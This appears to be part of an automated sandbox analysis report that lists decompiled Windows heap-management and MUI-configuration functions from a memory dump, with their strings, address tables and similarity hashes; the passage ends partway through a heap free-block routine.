                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0194B323
                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0194B38F
                • The resource is owned exclusively by thread %p, xrefs: 0194B374
                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0194B53F
                • *** Inpage error in %ws:%s, xrefs: 0194B418
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                • API String ID: 0-108210295
                • Opcode ID: b8948c3d847844ee0fdd5df42463af9fee03e147d10cdb2f785c0847a4b6b41d
                • Instruction ID: 205864ddb034f3b507504d6cbdd9b0a0b3fbd801c9dd46eda507b7b73253c8bc
                • Opcode Fuzzy Hash: b8948c3d847844ee0fdd5df42463af9fee03e147d10cdb2f785c0847a4b6b41d
                • Instruction Fuzzy Hash: F1812735A41210FFEB216A4ACC85EBB3F2AAF96B52F014148F50D9B256D265C601D7B2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01951C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                Download Yara Rule
                C-Code - Quality: 44%
                			E01951C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x18748a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0189B150();
				} else {
					E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x198589c);
				E0189B150("Heap error detected at %p (heap handle %p)\n",  *0x19858a0);
				_t27 =  *0x1985898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01951E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0189B150();
				} else {
					E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0189B150("Error code: %d - %s\n",  *0x1985898);
				_t113 =  *0x19858a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0189B150();
					} else {
						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0189B150("Parameter1: %p\n",  *0x19858a4);
				}
				_t115 =  *0x19858a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0189B150();
					} else {
						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0189B150("Parameter2: %p\n",  *0x19858a8);
				}
				_t117 =  *0x19858ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0189B150();
					} else {
						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0189B150("Parameter3: %p\n",  *0x19858ac);
				}
				_t119 =  *0x19858b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0189B150();
					} else {
						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x19858b4);
					E0189B150("Last known valid blocks: before - %p, after - %p\n",  *0x19858b0);
				} else {
					_t120 =  *0x19858b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0189B150();
				} else {
					E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0189B150("Stack trace available at %p\n", 0x19858c0);
			}











                0x01951c10
                0x01951c16
                0x01951c1e
                0x01951c3d
                0x01951c3e
                0x01951c20
                0x01951c35
                0x01951c3a
                0x01951c44
                0x01951c55
                0x01951c5a
                0x01951c65
                0x01951c67
                0x00000000
                0x01951c6e
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x01951c67
                0x01951cdc
                0x01951ce5
                0x01951d04
                0x01951d05
                0x01951ce7
                0x01951cfc
                0x01951d01
                0x01951d0b
                0x01951d17
                0x01951d1f
                0x01951d25
                0x01951d30
                0x01951d4f
                0x01951d50
                0x01951d32
                0x01951d47
                0x01951d4c
                0x01951d61
                0x01951d67
                0x01951d68
                0x01951d6e
                0x01951d79
                0x01951d98
                0x01951d99
                0x01951d7b
                0x01951d90
                0x01951d95
                0x01951daa
                0x01951db0
                0x01951db1
                0x01951db7
                0x01951dc2
                0x01951de1
                0x01951de2
                0x01951dc4
                0x01951dd9
                0x01951dde
                0x01951df3
                0x01951df9
                0x01951dfa
                0x01951e00
                0x01951e0a
                0x01951e13
                0x01951e32
                0x01951e33
                0x01951e15
                0x01951e2a
                0x01951e2f
                0x01951e39
                0x01951e4a
                0x01951e02
                0x01951e02
                0x01951e08
                0x00000000
                0x00000000
                0x01951e08
                0x01951e5b
                0x01951e7a
                0x01951e7b
                0x01951e5d
                0x01951e72
                0x01951e77
                0x01951e95

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                • API String ID: 0-2897834094
                • Opcode ID: 911e8466ca1195c20a1a03120ee03ca42cbd6e603d863dcfb1adfcb44d5d65a4
                • Instruction ID: 8c9ffb38db90a38c4d9460b832dd019b6840eddf2c8da517139ec14880fa2bb6
                • Opcode Fuzzy Hash: 911e8466ca1195c20a1a03120ee03ca42cbd6e603d863dcfb1adfcb44d5d65a4
                • Instruction Fuzzy Hash: 3361D432925985DFE751FB89E484F2473A4EB04B21B0E843AF90DFB311D6649A44CB1B
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018A3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                Download Yara Rule
                C-Code - Quality: 96%
                			E018A3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E018A1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E018A1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E018A1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E018A1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E018A1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L018B4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E018DF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E018E1370(_t276, 0x1874e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E018DBB40(0,  &_v68, _t170);
									if(L018A43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E018DBB40(_t257,  &_v68, _t243);
								if(L018A43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E018E1370(_t278, 0x1874e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L018B4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E018DF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E018E1370(_v16, 0x1874e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E018DBB40(_t262,  &_v68, _t244);
								if(L018A43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E018E1370(_t282, 0x1874e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E018DBB40(_t262,  &_v68, _t201);
							if(L018A43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L018B4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E018DF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E018E1370(_t280, 0x1874e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E018DBB40(_t267,  &_v68, _t245);
							if(L018A43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E018E1370(_t284, 0x1874e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E018DBB40(_t267,  &_v68, _t224);
						if(L018A43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                0x018a3d3c
                0x018a3d42
                0x018a3d44
                0x018a3d46
                0x018a3d49
                0x018a3d4c
                0x018a3d4f
                0x018a3d52
                0x018a3d55
                0x018a3d58
                0x018a3d5b
                0x018a3d5f
                0x018a3d61
                0x018a3d66
                0x018f8213
                0x018f8218
                0x018a4085
                0x018a4088
                0x018a408e
                0x018a4094
                0x018a409a
                0x018a40a0
                0x018a40a6
                0x018a40a9
                0x018a40af
                0x018a40b6
                0x018a40bd
                0x018a40bd
                0x018a3d83
                0x018f821f
                0x018f8229
                0x018f8238
                0x018f8238
                0x018f823d
                0x018f823d
                0x018a3da0
                0x018a3daf
                0x018a3db5
                0x018a3dba
                0x018a3dba
                0x018a3dd4
                0x018a3e94
                0x018a3eab
                0x018a3f6d
                0x018a3f84
                0x018a406b
                0x018a406b
                0x018a406e
                0x018a406e
                0x018a4070
                0x018a4074
                0x018f8351
                0x018f8351
                0x018a407a
                0x018a407f
                0x018f835d
                0x018f8370
                0x018f8377
                0x018f8379
                0x018f837c
                0x018f837c
                0x018f835d
                0x00000000
                0x018a407f
                0x018a3f8a
                0x018a3f8d
                0x018a3f90
                0x018a3f95
                0x018f830d
                0x018f830f
                0x018a3f9b
                0x018a3fac
                0x018a3fae
                0x018a3fb1
                0x018a3fb1
                0x018a3fb6
                0x018f8317
                0x018f831a
                0x00000000
                0x018a3fbc
                0x018a3fc1
                0x018a3fc9
                0x018a3fd7
                0x018a3fda
                0x018a3fdd
                0x018a4021
                0x018a4021
                0x018a4029
                0x018a4030
                0x018a4044
                0x018a4046
                0x018a4046
                0x018a4044
                0x018a4049
                0x018f8327
                0x018f8334
                0x018f8339
                0x018f833c
                0x018a404f
                0x018a404f
                0x018a404f
                0x018a4051
                0x018a4056
                0x018a4063
                0x018a4063
                0x018a4068
                0x00000000
                0x018a4068
                0x018a3fdf
                0x018a3fe2
                0x018a3fe4
                0x018a3fe7
                0x018a3fef
                0x018a4003
                0x018a4005
                0x018a4005
                0x018a400c
                0x018a4013
                0x018a4016
                0x018a4017
                0x018a401b
                0x018a401e
                0x00000000
                0x018a401e
                0x018a3fb6
                0x018a3eb1
                0x018a3eb4
                0x018a3eb7
                0x018a3ebc
                0x018f82a9
                0x018f82ab
                0x018a3ec2
                0x018a3ed3
                0x018a3ed5
                0x018a3ed8
                0x018a3ed8
                0x018a3edd
                0x018f82b3
                0x018f82b6
                0x00000000
                0x018a3ee3
                0x018a3ee8
                0x018a3eed
                0x018a3ef0
                0x018a3ef3
                0x018a3f02
                0x018a3f05
                0x018a3f08
                0x018f82c0
                0x018f82c3
                0x018f82c5
                0x018f82c8
                0x018f82d0
                0x018f82e4
                0x018f82e6
                0x018f82e6
                0x018f82ed
                0x018f82f4
                0x018f82f7
                0x018f82f8
                0x018f82fc
                0x018f82ff
                0x018f82ff
                0x018a3f0e
                0x018a3f11
                0x018a3f16
                0x018a3f1d
                0x018a3f31
                0x018f8307
                0x018f8307
                0x018a3f31
                0x018a3f39
                0x018a3f48
                0x018a3f4d
                0x018a3f50
                0x018a3f50
                0x018a3f53
                0x018a3f58
                0x018a3f65
                0x018a3f65
                0x018a3f6a
                0x00000000
                0x018a3f6a
                0x018a3edd
                0x018a3dda
                0x018a3ddd
                0x018a3de0
                0x018a3de5
                0x018f8245
                0x018a3deb
                0x018a3df7
                0x018a3dfc
                0x018a3dfe
                0x018a3e01
                0x018a3e01
                0x018a3e06
                0x018f824d
                0x018f824f
                0x018f8254
                0x00000000
                0x018a3e0c
                0x018a3e11
                0x018a3e16
                0x018a3e19
                0x018a3e29
                0x018a3e2c
                0x018a3e2f
                0x018f825c
                0x018f825f
                0x018f8261
                0x018f8264
                0x018f826c
                0x018f8280
                0x018f8282
                0x018f8282
                0x018f8289
                0x018f8290
                0x018f8293
                0x018f8294
                0x018f8298
                0x018f829b
                0x018f829b
                0x018a3e35
                0x018a3e38
                0x018a3e3d
                0x018a3e44
                0x018a3e58
                0x018f82a3
                0x018f82a3
                0x018a3e58
                0x018a3e60
                0x018a3e6f
                0x018a3e74
                0x018a3e77
                0x018a3e77
                0x018a3e7a
                0x018a3e7f
                0x018a3e8c
                0x018a3e8c
                0x018a3e91
                0x00000000
                0x018a3e91

                Strings
                • Kernel-MUI-Language-Allowed, xrefs: 018A3DC0
                • Kernel-MUI-Number-Allowed, xrefs: 018A3D8C
                • Kernel-MUI-Language-SKU, xrefs: 018A3F70
                • WindowsExcludedProcs, xrefs: 018A3D6F
                • Kernel-MUI-Language-Disallowed, xrefs: 018A3E97
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                • API String ID: 0-258546922
                • Opcode ID: d90b2506a9a0d80a8f3a42d70fc6d5a4b37e2fbe98dfda57ac5eafa64e8539f9
                • Instruction ID: 6a1811e3cd96d4d6524b2f30269fb0554baa0e02ed2b3048cf1d2c0a57cfbdc9
                • Opcode Fuzzy Hash: d90b2506a9a0d80a8f3a42d70fc6d5a4b37e2fbe98dfda57ac5eafa64e8539f9
                • Instruction Fuzzy Hash: 9FF14872D00619EBDB11DF98C980AEEBBB9FF59750F15006AEA05E7250E7749F01CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018940E1, Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                Download Yara Rule
                C-Code - Quality: 29%
                			E018940E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0189B150();
					} else {
						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0189B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E0189B150(", passed to %s", _t29);
					}
					_push("\n");
					E0189B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1986378 = 1;
						asm("int3");
						 *0x1986378 = 0;
					}
					return 0;
				}
				return 1;
			}





                0x018940e6
                0x018940e8
                0x018940f1
                0x018f042d
                0x018f044c
                0x018f0451
                0x018f042f
                0x018f0444
                0x018f0449
                0x018f045d
                0x018f0466
                0x018f046e
                0x018f0474
                0x018f0475
                0x018f047a
                0x018f048a
                0x018f048c
                0x018f0493
                0x018f0494
                0x018f0494
                0x00000000
                0x018f049b
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                • API String ID: 0-188067316
                • Opcode ID: 200b5fe93469a4c0b20d651e0f3cf7327133aea1022151d50131b243e8dcd5a4
                • Instruction ID: 10c706ca7c52b17eeb82715b0a33f8b3f0bf3799578abf41751b4c0f7031f374
                • Opcode Fuzzy Hash: 200b5fe93469a4c0b20d651e0f3cf7327133aea1022151d50131b243e8dcd5a4
                • Instruction Fuzzy Hash: 13012832104A419EE725976DA48DFA677A4DB12F34F2C407EF105CB752DAE8D640C621
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018BA830, Relevance: 5.4, Strings: 4, Instructions: 350COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 70%
                			E018BA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x1988748 - 1;
					if( *0x1988748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E0189B150();
									_t260 = _t257 + 4;
								} else {
									E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E0189B150();
								_t257 = _t260 + 4;
								__eflags =  *0x1987bc8;
								if(__eflags == 0) {
									E01952073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E0195A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E018ED5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E018BAB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
